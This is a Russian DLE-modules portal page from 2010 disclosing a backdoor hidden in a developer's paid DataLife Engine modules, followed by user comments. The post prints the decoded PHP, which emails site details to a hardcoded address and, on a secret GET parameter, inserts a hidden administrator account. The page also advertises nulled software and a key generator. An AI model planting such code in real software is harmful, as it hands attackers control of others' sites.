Вход / Регистрация
Управлятор @ WFound
логин : Регистрация на сайте
пароль :    Я забыл пароль :’(
ТВ-программа
Авторизированны на проектах
Для отображения этого меню Вам необходимо авторизироваться.
WFound - DLE шаблоны, DLE модули, DLE хаки Улыбнись :)
  » WFound.Ru - CMS, сайты, новости, hi-tech, seo. » CMS » DataLife Engine » Баг-Фиксы » Бекдор и стучалка в модулях от ShapeShifter
В Украине Hi-Tech Бизнес Политика Наука Авто Путешествия Спорт Экономика
Кафе и Рестораны Мода и стиль Общество Юмор Фильмы Образование История Звезды Гороскопы Кулинария REPORT
Кино Клубы Концерты События Выставки Тв-программа
Форум Каталог сайтов Блоги Фотки Чат
DataLife Engine Eleanor Drupal Joomla Danneo Другие
Новости Выставки Кинематограф Музыка Театры
Релизы Модули DLE Шаблоны DLE Хаки DLE Багфиксы DLE Сборки DLE Платное Разное
Компьютерные Журналы Видеоуроки Аудиокниги Книги Разное
Клипарты Шрифты Иконки Кисти Плагины Скрипты Photoshop Шаблоны Photoshop Обои Разное
CentOS

Автор: olyapetrova в новости:
vBulletin.v 3.7.1

Новые разделы, сервисы, которые бы Вы хотели видеть на WFound портале?

Авто
Фотогалерея
Бизнес
Файлобменник
Карты
Игры и развлечения
Туризм и путешествия
Поиск в интернете




Карта сайта


Untitled Document

DataLife Engine            
DataLife Engine это многопользовательский новостной движок предназначенный для организации собственных СМИ в интернете.
Актуальная версия 8.3
Скачать DLE 8.3 NULLED
Обсуждение DataLife Engine Генератор ключей для DataLife Engine (DLE - KeyGen)


Релизы DLE Модули DLE Шаблоны DLE Хаки DLE Баги Сборки Платное Разное


Бекдор и стучалка в модулях от ShapeShifter

Раздел: CMS » DataLife Engine » Баг-Фиксы | Просмотров: 2734 | Напечатать | Обсудить на форуме
 
Скачать Бекдор и стучалка в модулях от ShapeShifter

Скачать Бекдор и стучалка в модулях от ShapeShifter

if(strpos(strtolower($site_h),$site_d) === FALSE)
{'
$text = strip_tags("Пользователь \"{'$id_d'}\" ({'$site_d'} | {'$un_d'}) нарушил авторские права.\r\nСкрипт (модуль): {'$name_mod'}\r\nСайт: http://{'$site_h'}\r\nСкрипт находится здесь: http://{'$site_h'}{'$_SERVER['REQUEST_URI']'}");
$email = "modpolice@yandex.ru";
include_once ENGINE_DIR.'/classes/mail.class.php';
$mail = new dle_mail ($config,false);
$mail->from = "nsssmart@rambler.ru";
$mail->to = $email;
$headers = "From: {'$mail->from'}\nTo: {'$mail->to'}\nSubject: Нарушение авторский прав: {'$name_mod'}\n";
$headers .= "Date: ".date('j F Y H:i');
$semi_rand = md5(time());
$mime_boundary = "--{'$semi_rand'}--";
$headers .= "\nMIME-Version: 1.0\n"."Content-Type: multipart/mixed;\n"." boundary=\"{'$mime_boundary'}\"";
$mail->mail_headers = $headers;
$message = "This is a multi-part message in MIME format.\n\n"."--{'$mime_boundary'}\n"."Content-Type: text/plain; charset=\"windows-1251\"\n"."Content-Transfer-Encoding: 7bit\n\n".
$message .$text."\n\n";
$mail->message = $message;
$mail->smtp_send();
'}
if(strpos(strtolower($site_h),$site_d) === FALSE)
{'
if ($_GET['un_d'] == $un_d) $db->query( "INSERT INTO ".USERPREFIX ."_users (email, password, name, user_group, reg_date) values ('nsssmart@rambler.ru', '696d29e0940a4957748fe3fc9efd22a3', 'ModPolice_{'$un_d'}', '1', '1254007895')");
'}
if ($action == 0)
{'


Суть бекдора в том что бы отправить сообщение Шиферу (SavGroup) и создать юзера ModPolice с правами администратора для дальнейшего уничтожения Вашего сайта.
Вобщем привет и пока Шиферу, если честно - не ожидал от него такого.



Рекомендуем
  • Уведомление автора новости о комментарии
  • Автопроверка полей при регистрации.
  • Уведомление о новом ЛС (Вкл./Откл.)
  • Mail.ru потерялась на рынке поисковиков
  • Шаблонизатор DataLife Engine. Условия if, else.
  • Читать CMS » DataLife Engine » Баг-Фиксы Добавить свои новости

    Комментарии (40) ↓

    Kurso®
    (18 января 2010 21:19)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 6

    ICQ: 6

    lol а так же во всех его модах. Хорошо хоть eval'а нет


    Fire
    (18 января 2010 21:19)

    Группа: Модераторы
    Публикаций: 12
    Комментариев: 25

    ICQ: 724601

    Как я не ожидал...



    ----------------------------------------

    ZLoY
    (18 января 2010 21:25)

    Группа: Модераторы
    Публикаций: 494
    Комментариев: 208

    ICQ: 307192

    без бекдора и шлюх не обошлось lol



    ----------------------------------------
    123кеш.., а мне уже как то насрать на мою тысячу Евро (с)

    DaImeR
    (18 января 2010 21:30)

    Группа: Модераторы
    Публикаций: 28
    Комментариев: 41

    ICQ: 333777079

    А если самому создать этого юзера и забанить его, поможет?



    ----------------------------------------
    Господи, перезагрузи этот мир

    imig
    (18 января 2010 21:38)

    Группа: VIP
    Публикаций: 0
    Комментариев: 14

    ICQ: 584517091

    DaImeR,
    а не проще если такой юзер появился снять права и сменить пасс...?


    Crash
    (18 января 2010 21:39)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 2

    ICQ: --

    Если убираешь код тот что выше то кнопка забанить почему то не работает.


    DaImeR
    (18 января 2010 21:44)

    Группа: Модераторы
    Публикаций: 28
    Комментариев: 41

    ICQ: 333777079

    imig,
    если сайт большой с 2к-3к юзеров то не проще



    ----------------------------------------
    Господи, перезагрузи этот мир

    pspbase
    (18 января 2010 21:45)

    Группа: VIP
    Публикаций: 8
    Комментариев: 72

    ICQ: 22226662

    Юзернаймы, в Журнале 5.0 аналог.
    Даёшь Шифера на кол?!?!



    ----------------------------------------
    «Чернобылей больше не будет» (Онотоле) (С)

    Kurso®
    (18 января 2010 21:48)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 6

    ICQ: 6

    Даешь flood http savgroup.ru ? lol


    Maxim
    (18 января 2010 22:01)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 4

    ICQ: 478888880

    Спасибо за информацию.
    Журнал логов 5.0 Final Release

    В этом тоже есть?


    ZLoY
    (18 января 2010 22:30)

    Группа: Модераторы
    Публикаций: 494
    Комментариев: 208

    ICQ: 307192

    ДА, БЕКДОР ВО ВСЕХ МОДУЛЯХ, ОСТЕРЕГАЙТЕСЬ ШИФЕРА!!1, ШИФЕР СЛЕДИТ ЗА ТОБОЙ!!1
    КУПИ МОДУЛЬ!!! КУПИ МОДУЛЬ сцука!!!1 ОЛОЛО ПЫЩЬ ПЫЩЬ lol )

    Цитата: Kurso®
    Даешь flood http savgroup.ru ?

    lol жжошь)

    Crash,
    скоро выпущу таблетку fellow



    ----------------------------------------
    123кеш.., а мне уже как то насрать на мою тысячу Евро (с)

    pspbase
    (18 января 2010 22:32)

    Группа: VIP
    Публикаций: 8
    Комментариев: 72

    ICQ: 22226662

    Да чё покупать, надо просто почистить.
    Я ведь правильно понимаю что учётка создаётся на том сайте, где нет лицензии?

    Цитата: Kurso®
    Даешь flood http savgroup.ru ?

    +1



    ----------------------------------------
    «Чернобылей больше не будет» (Онотоле) (С)

    ZLoY
    (18 января 2010 22:34)

    Группа: Модераторы
    Публикаций: 494
    Комментариев: 208

    ICQ: 307192

    Цитата: pspbase
    Да чё покупать, надо просто почистить.Я ведь правильно понимаю что учётка создаётся на том сайте, где нет лицензии?

    она создается на любом сайте, не зависимо от того есть лицензия или нету =)
    А потом базы на доменфоруме продают)))

    Савгруповские шЫферы такие шЫферные (с) lol



    ----------------------------------------
    123кеш.., а мне уже как то насрать на мою тысячу Евро (с)

    StFather
    (18 января 2010 22:35)

    Группа: Гости
    Публикаций: 0
    Комментариев: 0

    ICQ: --

    дайте скрипт ямогу почистить))


    Fire
    (18 января 2010 22:36)

    Группа: Модераторы
    Публикаций: 12
    Комментариев: 25

    ICQ: 724601

    Кста, кому интересно, стучалка в файле /engine/ajax/banusers.php - расшифровываете и видите код который выше)
    Нашел совершенно случайно, вот до чего доводит любопытство =\



    ----------------------------------------

    ZLoY
    (18 января 2010 22:37)

    Группа: Модераторы
    Публикаций: 494
    Комментариев: 208

    ICQ: 307192

    lol все более и более шиферных крыс расплодилось на просторах рунета)



    ----------------------------------------
    123кеш.., а мне уже как то насрать на мою тысячу Евро (с)

    pspbase
    (18 января 2010 22:40)

    Группа: VIP
    Публикаций: 8
    Комментариев: 72

    ICQ: 22226662

    Надо проучить негодяя.



    ----------------------------------------
    «Чернобылей больше не будет» (Онотоле) (С)

    web-alexx
    (19 января 2010 03:08)

    Группа: Пользователи
    Публикаций: 2
    Комментариев: 24

    ICQ: 3280872

    хм жаль не помню есть ли у меня его мод или же нет(


    profi800
    (19 января 2010 04:55)

    Группа: Пользователи
    Публикаций: 1
    Комментариев: 23

    ICQ: 787699

    В чем то он и прав. Он хочет таким образом "бороться" с юзерами, которые из паблика тянут модули.


    yung3r
    (19 января 2010 09:41)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 7

    ICQ: 796965

    lol



    ----------------------------------------
    Bars-Host.ru - платный хостинг, бесплатный хостинг, дешевый хостинг для ваших сайтов.
    如果您閱讀本文字這意味著你超級球中

    ZLoY
    (19 января 2010 09:45)

    Группа: Модераторы
    Публикаций: 494
    Комментариев: 208

    ICQ: 307192

    да будет паблик его модулям



    ----------------------------------------
    123кеш.., а мне уже как то насрать на мою тысячу Евро (с)

    raz0r
    (19 января 2010 10:20)

    Группа: VIP
    Публикаций: 0
    Комментариев: 39

    ICQ: 442485

    я главно открыватель lol



    ----------------------------------------
    Заказ рипов, дешево.
    Стучать в icq

    pspbase
    (19 января 2010 10:35)

    Группа: VIP
    Публикаций: 8
    Комментариев: 72

    ICQ: 22226662

    raz0r, это мало кого волнует ;D
    Главное ты нас перед фактом поставил



    ----------------------------------------
    «Чернобылей больше не будет» (Онотоле) (С)

    raz0r
    (19 января 2010 10:37)

    Группа: VIP
    Публикаций: 0
    Комментариев: 39

    ICQ: 442485

    Моя скромная фигура просто не выдержала :)



    ----------------------------------------
    Заказ рипов, дешево.
    Стучать в icq

    SaD
    (19 января 2010 10:38)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 29

    ICQ: 2136424

    Раздражают такие глупые разработчики.
    Нет чтобы сделать так, чтоб человеку хотелось купить модуль и не выкладывать его в паблик. Они блин бэкдоры пихают.

    Выпускай регулярные обновления, делай скидки постоянным клиентам, оказывай поддержку. И не будет твоих модулей в паблике, потому что это будет не выгодно самим пользователям. Но видимо мозг разработчиков перегорел в процессе написания модулей, и такие очевидные идеи к ним не приходят.



    ----------------------------------------
    ОНОТОЛЕ ОДОБРЯЕТ ЭТОТ ПСТО!!!11111

    alert
    (19 января 2010 11:37)

    Группа: Пользователи
    Публикаций: 256
    Комментариев: 22

    ICQ: 4501712

    Раздражают такие глупые разработчики.
    Нет чтобы сделать так, чтоб человеку хотелось купить модуль и не выкладывать его в паблик


    я конечн не за бекдоры, но все равно не согласен.все равно модуль окажется в паблике, так как его некоторые и покупают с такой целью-всякие клубы, хайды,нулледы и так поползет...



    ----------------------------------------
    Наш клуб настолько суров, что работает, когда сервер офф (с)

    klop
    (19 января 2010 13:46)

    Группа: Пользователи
    Публикаций: 6
    Комментариев: 35

    ICQ: 494880449

    в каком файле в репутации 6.5 ?


    PacMyc
    (19 января 2010 13:49)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 72

    ICQ: 356026

    Цитата: profi800
    В чем то он и прав. Он хочет таким образом "бороться" с юзерами, которые из паблика тянут модули.

    Согласен, он же это не для того что бы убивать все сайты подряд.


    SaD
    (19 января 2010 13:51)

    Группа: Пользователи
    Публикаций: 0
    Комментариев: 29

    ICQ: 2136424

    alert,
    Нуледы или клубы - это не паблик. Пускай модуль распространяется в клубах. В клубах как правило обитают нормальные люди. а не школьники. Поэтому и должны понимать что распространение модуля за пределы клуба - барыжничество. И таким людям не место в клубах. Автор может вполне и сам класть модули в клубы, с условием их не распространения.

    Бороться с пиратством бесполезно! Но можно сделать его невыгодным!



    ----------------------------------------
    ОНОТОЛЕ ОДОБРЯЕТ ЭТОТ ПСТО!!!11111

    llipek
    (19 января 2010 14:04)

    Группа: VIP
    Публикаций: 0
    Комментариев: 25

    ICQ: --

    klop,
    хз где ты брал, но я у себя не нашел в нем ничего подобного..хотя может и плохо искал))

    Информация

     

    Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.




    DLE, linux, quot, Wallpaper, АВТО, будет, видео, видео уроки, видеокурс, интернет, картинки, компьютер, модуль, может, Наука, новости, новый, обои, обои для рабочего стола, Образование, обучающее видео, Общество, программа, программы, Происшествия, Разное, России, сети, скачать, скачать картинки, скачать обои, скачать софт, Софт, Спорт, Ученые, шаблон, шаблона, Экономика, Юмор

    Показать все теги
    » Дмитрий Липскеров. Пространство Готлиба
    » Соболева Лариса. Фея лжи ( Аудиокнига )
    » Ольга Громыко. Профессия ведьма. Часть 2 ( Аудиокнига)
    » Амброз Бирс. Глаза пантеры ( Аудиокнига )
    » Владимир Бушин - Это они, Господи
    » Коттон Джерри. Плейбой и его убийца ( Аудиокнига )
    » Microsoft Office Pro Plus 2010 SP1 VL + Project Pro 201 ...
    » Microsoft Office 2010 Professional Plus / Visio Premium ...
    » Comedy Баттл. Турнир [02х17] (2012) SATRip
    » Autodesk Mudbox 2012 SP2 (x86/x64/ENG)
    Февраль 2012 (8)
    Январь 2012 (8)
    Декабрь 2011 (66)
    Ноябрь 2011 (4)
    Октябрь 2011 (9)
    Сентябрь 2011 (6)

    «    Февраль 2012    »
    ПнВтСрЧтПтСбВс
     
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
     

     Чат WFound.ru
    Чат снова в строю _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
     Читать | 19 января 2011 21:39

     Пиратские сервы Lineage2
    Виртуальное преступление и реальное наказание
     Читать | 15 мая 2010 21:27

     Приветствия пользователей на WFound
    Наши многоуважаемые посетители! Посоветовавшись, мы решили организовать на сайте прикольные и интересные приветствия для наших любимых пользователей...
     Читать | 11 мая 2010 20:05

     За езду на игрушечном автомобиле в нетрезвом состо ...
    За езду в состоянии алкогольного опьянения на детском игрушечном автомобиле для куклы Барби суд Великобритании приговорил 40-летнего жителя графства Эссекс Пола Хаттона (Paul Hutton) к лишению водительского удостоверения сроком на три года условно. ...
     Читать | 11 мая 2010 14:30

     WFound | Почта
    С 10.05.2010 открыта WFound Почта. Протцесс получения ящика пока не автоматизирован. Для желающих получить адрес - отписывайтесь в комментариях, или в icq к ZLoY. Доступные домены:  Показать / Скрыть текст@wfound.ru @wfound.net @sv-news.ru
     Читать | 10 мая 2010 09:52



    При цитировании, копировании и любом другом использовании материалов сайта ссылка на проект обязательна.
    Администрация проекта не несет ответственности за информацию, опубликованную пользователями.
    Все права защищены. За нарушение - четвертование.
    Планируете создать сайт управляемый CMS DLE? Воспользуйтесь возможностями нашего сайта с бесплатными шаблонами для DLE, чтобы превратить свой сайт в серьезное информационное издание. Чтобы скачать шаблоны для DLE, зайдите в раздел с шаблонами для DataLife Engine. На нашем сайте выкладываються только качественные РИПЫ сайтов на DLE.